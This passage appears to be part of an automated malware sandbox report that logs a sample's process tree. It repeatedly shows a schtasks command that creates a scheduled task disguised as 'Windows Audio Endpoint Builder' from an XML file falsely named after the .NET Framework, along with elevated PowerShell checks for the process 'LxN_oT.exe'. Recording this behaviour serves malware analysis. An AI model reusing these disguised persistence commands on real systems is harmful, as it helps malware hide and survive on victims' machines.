Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	10:04:12
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7240, Parent PID: 7184

General

Target ID:	54
Start time:	10:04:12
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	10:04:13
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	10:04:17
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7344, Parent PID: 7320

General

Target ID:	57
Start time:	10:04:17
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	10:04:19
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1084, Parent PID: 4124

General

Target ID:	59
Start time:	10:04:19
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	10:04:19
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	10:04:23
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	10:04:24
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	10:04:25
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7680, Parent PID: 7648

General

Target ID:	64
Start time:	10:04:25
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	10:04:25
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	10:04:29
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5512, Parent PID: 6120

General

Target ID:	67
Start time:	10:04:29
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	10:04:32
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2940, Parent PID: 5824

General

Target ID:	69
Start time:	10:04:32
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	10:04:32
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	10:04:35
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	10:04:35
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	10:04:38
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6728, Parent PID: 1524

General

Target ID:	74
Start time:	10:04:38
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	10:04:38
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	10:04:41
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8104, Parent PID: 8100

General

Target ID:	77
Start time:	10:04:41
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	10:04:44
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7332, Parent PID: 7284

General

Target ID:	79
Start time:	10:04:44
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	10:04:44
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	10:04:47
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3648, Parent PID: 2180

General

Target ID:	82
Start time:	10:04:47
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	10:04:50
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1288, Parent PID: 3948

General

Target ID:	84
Start time:	10:04:50
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	10:04:50
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	10:04:53
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	10:04:53
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	10:04:57
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1448, Parent PID: 1256

General

Target ID:	89
Start time:	10:04:57
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	10:04:57
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	10:04:59
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2316, Parent PID: 3276

General

Target ID:	92
Start time:	10:04:59
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	10:05:04
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4408, Parent PID: 6436

General

Target ID:	94
Start time:	10:05:04
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	10:05:04
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	10:05:05
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4164, Parent PID: 6588

General

Target ID:	97
Start time:	10:05:05
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	10:05:11
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	10:05:12
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	10:05:17
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 3384, Parent PID: 5800

General

Target ID:	101
Start time:	10:05:18
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3004, Parent PID: 3384

General

Target ID:	102
Start time:	10:05:18
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	10:05:22
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	104
Start time:	10:05:23
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 1772, Parent PID: 5800

General

Target ID:	105
Start time:	10:05:25
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	10:05:25
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	107
Start time:	10:05:28
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	108
Start time:	10:05:32
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	109
Start time:	10:05:32
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	110
Start time:	10:05:34
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 6284, Parent PID: 5800

General

Target ID:	111
Start time:	10:05:39
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
